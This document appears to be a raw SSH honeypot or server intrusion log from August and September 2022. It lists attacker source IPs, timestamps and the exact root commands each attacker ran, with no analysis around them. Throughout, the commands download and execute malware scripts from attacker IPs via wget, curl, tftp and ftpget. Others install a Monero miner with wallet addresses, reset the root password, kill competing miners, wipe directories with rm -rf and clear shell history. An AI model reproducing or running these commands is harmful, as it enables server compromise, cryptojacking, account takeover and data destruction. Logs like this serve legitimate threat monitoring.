Exec rm -rf *; cd /tmp; rm -rf *; pkill xmrig; echo -e "xoxox1\nxoxox1" | passwd; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj
rm -rf *
cd /tmp
rm -rf *
pkill xmrig
echo -e "xoxox1\nxoxox1" | passwd
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj

From 212.193.0.157 17-Aug-2022 19:11:35 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.182.129.239/sensi.sh; curl -O http://107.182.129.239/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 107.182.129.239 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 107.182.129.239; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 107.182.129.239 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://107.182.129.239/sensi.sh
curl -O http://107.182.129.239/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 107.182.129.239 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 107.182.129.239
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 107.182.129.239 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *

From 212.193.0.157 18-Aug-2022 07:37:25 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://109.206.241.62/Fourloko.sh; chmod 777 *; sh Fourloko.sh; tftp -g 109.206.241.62 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://109.206.241.62/Fourloko.sh
chmod 777 *
sh Fourloko.sh
tftp -g 109.206.241.62 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 5.252.22.38 19-Aug-2022 15:03:56 ssh2 root
Exec df -h
df -h

From 35.230.149.56 20-Aug-2022 11:25:32 ssh2 root
Exec cd /tmp; rm -rf wget.sh; wget http://109.206.241.211/wget.sh; curl -O http://109.206.241.211/wget.sh; chmod 777 wget.sh; ./wget.sh
cd /tmp
rm -rf wget.sh
wget http://109.206.241.211/wget.sh
curl -O http://109.206.241.211/wget.sh
chmod 777 wget.sh
./wget.sh

From 34.159.167.205 21-Aug-2022 03:31:29 ssh2 root
Exec cd /tmp; rm -rf wget.sh; wget http://109.206.241.211/wget.sh; curl -O http://109.206.241.211/wget.sh; chmod 777 wget.sh; ./wget.sh
cd /tmp
rm -rf wget.sh
wget http://109.206.241.211/wget.sh
curl -O http://109.206.241.211/wget.sh
chmod 777 wget.sh
./wget.sh

From 95.214.24.192 21-Aug-2022 07:05:13 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://109.206.241.200/arcbins.sh; chmod 777 arcbins.sh; sh arcbins.sh; tftp 109.206.241.200 -c get arctftp1.sh; chmod 777 arctftp1.sh; sh arctftp1.sh; tftp -r arctftp2.sh -g 109.206.241.200; chmod 777 arctftp2.sh; sh arctftp2.sh; rm -rf arcbins.sh arctftp1.sh arctftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://109.206.241.200/arcbins.sh
chmod 777 arcbins.sh
sh arcbins.sh
tftp 109.206.241.200 -c get arctftp1.sh
chmod 777 arctftp1.sh
sh arctftp1.sh
tftp -r arctftp2.sh -g 109.206.241.200
chmod 777 arctftp2.sh
sh arctftp2.sh
rm -rf arcbins.sh arctftp1.sh arctftp2.sh
rm -rf *

From 211.119.38.159 22-Aug-2022 02:54:48 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';(cd /tmp/ && curl -O http://103.104.119.144/why);bash /tmp/why
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
(cd /tmp/
curl -O http://103.104.119.144/why)
bash /tmp/why

From 95.214.24.192 22-Aug-2022 04:59:38 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://109.206.241.219/bins/phantom.x86; curl -O http://109.206.241.219/bins/phantom.x86;cat phantom.x86 >robben;chmod +x *;./robben Payload
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://109.206.241.219/bins/phantom.x86
curl -O http://109.206.241.219/bins/phantom.x86
cat phantom.x86 >robben
chmod +x *
./robben Payload

From 95.214.24.192 22-Aug-2022 22:43:19 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://109.206.241.200/apibins.sh; chmod 777 apibins.sh; sh apibins.sh; tftp 109.206.241.200 -c get apitftp1.sh; chmod 777 apitftp1.sh; sh apitftp1.sh; tftp -r apitftp2.sh -g 109.206.241.200; chmod 777 apitftp2.sh; sh apitftp2.sh; rm -rf apibins.sh apitftp1.sh apitftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://109.206.241.200/apibins.sh
chmod 777 apibins.sh
sh apibins.sh
tftp 109.206.241.200 -c get apitftp1.sh
chmod 777 apitftp1.sh
sh apitftp1.sh
tftp -r apitftp2.sh -g 109.206.241.200
chmod 777 apitftp2.sh
sh apitftp2.sh
rm -rf apibins.sh apitftp1.sh apitftp2.sh
rm -rf *

From 45.232.176.4 24-Aug-2022 09:21:08 ssh2 root
Exec cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c; nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c
cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c
nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c

From 95.214.24.192 25-Aug-2022 07:48:21 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://109.206.241.200/apibins.sh; chmod 777 apibins.sh; sh apibins.sh; tftp 109.206.241.200 -c get apitftp1.sh; chmod 777 apitftp1.sh; sh apitftp1.sh; tftp -r apitftp2.sh -g 109.206.241.200; chmod 777 apitftp2.sh; sh apitftp2.sh; rm -rf apibins.sh apitftp1.sh apitftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://109.206.241.200/apibins.sh
chmod 777 apibins.sh
sh apibins.sh
tftp 109.206.241.200 -c get apitftp1.sh
chmod 777 apitftp1.sh
sh apitftp1.sh
tftp -r apitftp2.sh -g 109.206.241.200
chmod 777 apitftp2.sh
sh apitftp2.sh
rm -rf apibins.sh apitftp1.sh apitftp2.sh
rm -rf *

From 107.182.129.203 25-Aug-2022 15:59:35 ssh2 root
Exec uname -a; nvidia-smi; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1
uname -a
nvidia-smi
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1

From 179.43.156.144 27-Aug-2022 09:56:57 ssh2 root
Exec echo root:ds234e31s123tij24jtiu3ji4rg|chpasswd|bash; uname -a; pkill a; pkill xmrig; pkill cnrig; pkill xmrRIG; pkill xmr; pkill x86; pkill x86_64; pkill Opera; nvidia-smi; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1; echo 1 > /root/.bash_history; history -c; wget http://179.43.154.138/lanscancrypt; curl -O http://179.43.154.138/lanscancrypt; chmod 777 lanscancrypt; ./lanscancrypt
echo root:ds234e31s123tij24jtiu3ji4rg|chpasswd|bash
uname -a
pkill a
pkill xmrig
pkill cnrig
pkill xmrRIG
pkill xmr
pkill x86
pkill x86_64
pkill Opera
nvidia-smi
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1
echo 1 > /root/.bash_history
history -c
wget http://179.43.154.138/lanscancrypt
curl -O http://179.43.154.138/lanscancrypt
chmod 777 lanscancrypt
./lanscancrypt

From 109.205.213.14 27-Aug-2022 11:31:07 ssh2 root
Exec yum install wget -y; apt install wget -y; sudo apt wget -y; sudo apt-get -y purge wget; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://109.206.241.17/Beastmode.sh; curl -O http://109.206.241.17/Beastmode.sh; chmod 777 Beastmode.sh; sh Beastmode.sh; tftp 109.206.241.17 -c get Beastmode.sh; chmod 777 Beastmode.sh; sh Beastmode.sh; tftp -r Beastmode2.sh -g 109.206.241.17; chmod 777 Beastmode2.sh; sh Beastmode2.sh; ftpget -v -u anonymous -p anonymous -P 21 109.206.241.17 Beastmode1.sh Beastmode1.sh; sh Beastmode1.sh; rm -rf Beastmode.sh Beastmode.sh Beastmode2.sh Beastmode1.sh; rm -rf *
yum install wget -y
apt install wget -y
sudo apt wget -y
sudo apt-get -y purge wget
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://109.206.241.17/Beastmode.sh
curl -O http://109.206.241.17/Beastmode.sh
chmod 777 Beastmode.sh
sh Beastmode.sh
tftp 109.206.241.17 -c get Beastmode.sh
chmod 777 Beastmode.sh
sh Beastmode.sh
tftp -r Beastmode2.sh -g 109.206.241.17
chmod 777 Beastmode2.sh
sh Beastmode2.sh
ftpget -v -u anonymous -p anonymous -P 21 109.206.241.17 Beastmode1.sh Beastmode1.sh
sh Beastmode1.sh
rm -rf Beastmode.sh Beastmode.sh Beastmode2.sh Beastmode1.sh
rm -rf *

From 95.214.24.192 27-Aug-2022 12:54:02 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://109.206.241.17/Beastmode.sh; curl -O http://109.206.241.17/Beastmode.sh; chmod 777 Beastmode.sh; sh Beastmode.sh; tftp 109.206.241.17 -c get Beastmode.sh; chmod 777 Beastmode.sh; sh Beastmode.sh; tftp -r Beastmode2.sh -g 109.206.241.17; chmod 777 Beastmode2.sh; sh Beastmode2.sh; ftpget -v -u anonymous -p anonymous -P 21 109.206.241.17 Beastmode1.sh Beastmode1.sh; sh Beastmode1.sh; rm -rf Beastmode.sh Beastmode.sh Beastmode2.sh Beastmode1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://109.206.241.17/Beastmode.sh
curl -O http://109.206.241.17/Beastmode.sh
chmod 777 Beastmode.sh
sh Beastmode.sh
tftp 109.206.241.17 -c get Beastmode.sh
chmod 777 Beastmode.sh
sh Beastmode.sh
tftp -r Beastmode2.sh -g 109.206.241.17
chmod 777 Beastmode2.sh
sh Beastmode2.sh
ftpget -v -u anonymous -p anonymous -P 21 109.206.241.17 Beastmode1.sh Beastmode1.sh
sh Beastmode1.sh
rm -rf Beastmode.sh Beastmode.sh Beastmode2.sh Beastmode1.sh
rm -rf *

From 179.43.162.13 28-Aug-2022 02:51:11 ssh2 root
Exec echo root:ds234e31s1221224jtiu3ji3rg|chpasswd|bash; uname -a; pkill a; pkill xmrig; pkill xmra64; pkill xmrig64; pkill cnrig; pkill xmrRIG; pkill xmr; pkill x86; pkill x86_64; pkill Opera; nvidia-smi; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1; echo 1 > /root/.bash_history; history -c; wget http://179.43.154.138/lanscancrypt; curl -O http://179.43.154.138/lanscancrypt; chmod 777 lanscancrypt; ./lanscancrypt
echo root:ds234e31s1221224jtiu3ji3rg|chpasswd|bash
uname -a
pkill a
pkill xmrig
pkill xmra64
pkill xmrig64
pkill cnrig
pkill xmrRIG
pkill xmr
pkill x86
pkill x86_64
pkill Opera
nvidia-smi
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1
echo 1 > /root/.bash_history
history -c
wget http://179.43.154.138/lanscancrypt
curl -O http://179.43.154.138/lanscancrypt
chmod 777 lanscancrypt
./lanscancrypt

From 179.43.162.13 29-Aug-2022 17:29:38 ssh2 root
Exec echo root:ds234e31s1221224jtiu3ji3rg|chpasswd|bash; uname -a; pkill a; pkill xmrig; pkill xmra64; pkill xmrig64; pkill cnrig; pkill xmrRIG; pkill xmr; pkill x86; pkill x86_64; pkill Opera; nvidia-smi; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1
echo root:ds234e31s1221224jtiu3ji3rg|chpasswd|bash
uname -a
pkill a
pkill xmrig
pkill xmra64
pkill xmrig64
pkill cnrig
pkill xmrRIG
pkill xmr
pkill x86
pkill x86_64
pkill Opera
nvidia-smi
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1

From 163.123.143.164 30-Aug-2022 21:41:37 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://208.67.106.145/bins.sh; chmod 777 bins.sh; sh bins.sh;rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://208.67.106.145/bins.sh
chmod 777 bins.sh
sh bins.sh
rm -rf *

From 179.43.156.144 31-Aug-2022 20:04:22 ssh2 root
Exec echo root:ds234e31s223tij24jtiu3ji1rg|chpasswd|bash; uname -a; pkill a; pkill xmrig; pkill cnrig; pkill xmrRIG; pkill xmr; pkill x86; pkill x86_64; pkill Opera; nvidia-smi; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1
echo root:ds234e31s223tij24jtiu3ji1rg|chpasswd|bash
uname -a
pkill a
pkill xmrig
pkill cnrig
pkill xmrRIG
pkill xmr
pkill x86
pkill x86_64
pkill Opera
nvidia-smi
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1

From 34.133.31.41 1-Sep-2022 07:23:10 ssh2 root
Exec cd /tmp; rm -rf ssh.sh; wget http://217.114.43.19/ssh.sh; curl -O http://217.114.43.19/ssh.sh; chmod 777 ssh.sh; sh ssh.sh
cd /tmp
rm -rf ssh.sh
wget http://217.114.43.19/ssh.sh
curl -O http://217.114.43.19/ssh.sh
chmod 777 ssh.sh
sh ssh.sh

From 35.230.116.36 1-Sep-2022 13:34:47 ssh2 root
Exec cd /tmp; rm -rf ssh.sh; wget http://208.67.104.31/ssh.sh; curl -O http://208.67.104.31/ssh.sh; chmod 777 ssh.sh; sh ssh.sh
cd /tmp
rm -rf ssh.sh
wget http://208.67.104.31/ssh.sh
curl -O http://208.67.104.31/ssh.sh
chmod 777 ssh.sh
sh ssh.sh

From 209.141.62.71 1-Sep-2022 21:10:52 ssh2 root
Exec nproc; uname -a
nproc
uname -a

From 103.9.36.251 2-Sep-2022 17:40:46 ssh2 root
Exec uname -a ; lscpu
uname -a
lscpu

From 103.9.36.251 2-Sep-2022 17:40:47 ssh2 root
Exec uname -a ; lscpu
uname -a
lscpu
Exec uname -a ; lscpu
uname -a
lscpu

From 208.67.106.145 6-Sep-2022 19:46:09 ssh2 root
Exec wget http://cnc.cyberproperty.us/bins.sh; chmod 777 bins.sh; sh bins.sh;rm -rf *
wget http://cnc.cyberproperty.us/bins.sh
chmod 777 bins.sh
sh bins.sh
rm -rf *

From 119.84.8.9 7-Sep-2022 02:15:45 ssh2 root
Exec uname 
uname

From 179.43.162.13 8-Sep-2022 07:46:33 ssh2 root
Exec echo root:ds234e31s1221224jtiu3ji3rg|chpasswd|bash; uname -a; pkill a; pkill xmrig; pkill xmra64; pkill xmrig64; pkill cnrig; pkill xmrRIG; pkill xmr; pkill x86; pkill x86_64; pkill Opera; nvidia-smi; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1
echo root:ds234e31s1221224jtiu3ji3rg|chpasswd|bash
uname -a
pkill a
pkill xmrig
pkill xmra64
pkill xmrig64
pkill cnrig
pkill xmrRIG
pkill xmr
pkill x86
pkill x86_64
pkill Opera
nvidia-smi
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1

From 179.43.156.144 10-Sep-2022 19:29:54 ssh2 root
Exec echo root:ds234e31s223tij24jtiu3ji1rg|chpasswd|bash; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1; nvidia-smi
echo root:ds234e31s223tij24jtiu3ji1rg|chpasswd|bash
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1
nvidia-smi

From 222.71.55.180 11-Sep-2022 06:44:20 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://39.165.53.17:8088/iposzz/dred -o /tmp/dred;perl /tmp/dred
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://39.165.53.17:8088/iposzz/dred -o /tmp/dred
perl /tmp/dred
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://39.165.53.17:8088/iposzz/dred -o /tmp/dred;perl /tmp/dred
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://39.165.53.17:8088/iposzz/dred -o /tmp/dred
perl /tmp/dred

From 42.193.175.102 11-Sep-2022 15:28:17 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://39.165.53.17:8088/iposzz/dred -o /tmp/dred;perl /tmp/dred
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://39.165.53.17:8088/iposzz/dred -o /tmp/dred
perl /tmp/dred

From 179.43.142.130 11-Sep-2022 16:41:22 ssh2 root
Exec uname -a; uname -sr; uname -r; cat /config/cgminer.conf; hostname
uname -a
uname -sr
uname -r
cat /config/cgminer.conf
hostname

From 179.43.156.143 14-Sep-2022 10:16:37 ssh2 root
Exec echo root:ds234e31s123tij24jtiu3jisrg|chpasswd|bash; uname -a; pkill xmrig; pkill cnrig; pkill x86; pkill x86_64; pkill Opera; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1; nvidia-smi
echo root:ds234e31s123tij24jtiu3jisrg|chpasswd|bash
uname -a
pkill xmrig
pkill cnrig
pkill x86
pkill x86_64
pkill Opera
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1
nvidia-smi

From 179.43.145.74 14-Sep-2022 10:22:10 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.182.129.239/Fourloko.sh; chmod 777 *; sh Fourloko.sh; tftp -g 107.182.129.239 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://107.182.129.239/Fourloko.sh
chmod 777 *
sh Fourloko.sh
tftp -g 107.182.129.239 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 179.43.162.13 14-Sep-2022 11:45:32 ssh2 root
Exec echo root:d9s2349e319s12212246jti6u3j6i3r3|chpasswd|bash; uname -a; pkill a; pkill xmrig; pkill xmra64; pkill xmrig64; pkill cnrig; pkill xmrRIG; pkill xmr; pkill x86; pkill x86_64; pkill Opera; nvidia-smi; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1
echo root:d9s2349e319s12212246jti6u3j6i3r3|chpasswd|bash
uname -a
pkill a
pkill xmrig
pkill xmra64
pkill xmrig64
pkill cnrig
pkill xmrRIG
pkill xmr
pkill x86
pkill x86_64
pkill Opera
nvidia-smi
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1

From 80.76.51.46 15-Sep-2022 19:15:33 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.23.109.212/doge.sh; chmod 777 doge.sh; sh doge.sh; tftp 46.23.109.212 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 46.23.109.212; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 46.23.109.212 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf doge.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://46.23.109.212/doge.sh
chmod 777 doge.sh
sh doge.sh
tftp 46.23.109.212 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 46.23.109.212
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 46.23.109.212 ftp1.sh ftp1.sh
sh ftp1.sh
rm -rf doge.sh tftp1.sh tftp2.sh ftp1.sh
rm -rf *

From 120.53.240.51 16-Sep-2022 09:09:27 ssh2 root
Exec echo -n tf6pqfcd|md5sum;uname -a
echo -n tf6pqfcd|md5sum
uname -a

From 141.98.10.88 17-Sep-2022 22:28:48 ssh2 root
Exec echo root:2313374any1|chpasswd|bash; lspci | grep VGA || lspci | grep 3D; nvidia-smi; cat/etc/issue; uname -a; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1
echo root:2313374any1|chpasswd|bash
lspci | grep VGA || lspci | grep 3D
nvidia-smi
cat/etc/issue
uname -a
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1

From 179.43.156.144 20-Sep-2022 08:10:49 ssh2 root
Exec echo root:ds234e31s223tij24j4h777ji1rg|chpasswd|bash; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1; nvidia-smi
echo root:ds234e31s223tij24j4h777ji1rg|chpasswd|bash
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1
nvidia-smi

From 34.75.255.185 24-Sep-2022 13:20:51 ssh2 root
Exec cd /tmp; rm -rf xmr*; wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz && tar -xvf xmrig-6.18.0-linux-x64.tar.gz && cd xmrig-6.18.0 && screen ./xmrig -o stratum+tcp://randomxmonero.usa-east.nicehash.com:3380 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.8 -k --nicehash --coin monero -a rx/0; ./xmrig -o stratum+tcp://randomxmonero.usa-east.nicehash.com:3380 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.8 -k --nicehash --coin monero -a rx/0
cd /tmp
rm -rf xmr*
wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz
tar -xvf xmrig-6.18.0-linux-x64.tar.gz
cd xmrig-6.18.0
screen ./xmrig -o stratum+tcp://randomxmonero.usa-east.nicehash.com:3380 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.8 -k --nicehash --coin monero -a rx/0
./xmrig -o stratum+tcp://randomxmonero.usa-east.nicehash.com:3380 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.8 -k --nicehash --coin monero -a rx/0

From 178.138.96.231 24-Sep-2022 14:39:26 ssh2 root
w
lscpu
wow
mmm suck nice processor

From 179.43.156.143 25-Sep-2022 13:01:33 ssh2 root
Exec echo root:ds234e31s123tij24jtiu23ji3rg|chpasswd|bash; uname -a; pkill xmrig; pkill cnrig; pkill x86; pkill x86_64; pkill Opera; nvidia-smi; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1
echo root:ds234e31s123tij24jtiu23ji3rg|chpasswd|bash
uname -a
pkill xmrig
pkill cnrig
pkill x86
pkill x86_64
pkill Opera
nvidia-smi
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1

From 141.98.10.88 25-Sep-2022 18:52:34 ssh2 root
Exec echo root:23jh133742any1|chpasswd|bash; lspci | grep VGA || lspci | grep 3D; nvidia-smi; cat/etc/issue; uname -a; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1
echo root:23jh133742any1|chpasswd|bash
lspci | grep VGA || lspci | grep 3D
nvidia-smi
cat/etc/issue
uname -a
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1

From 34.148.138.119 25-Sep-2022 22:05:33 ssh2 root
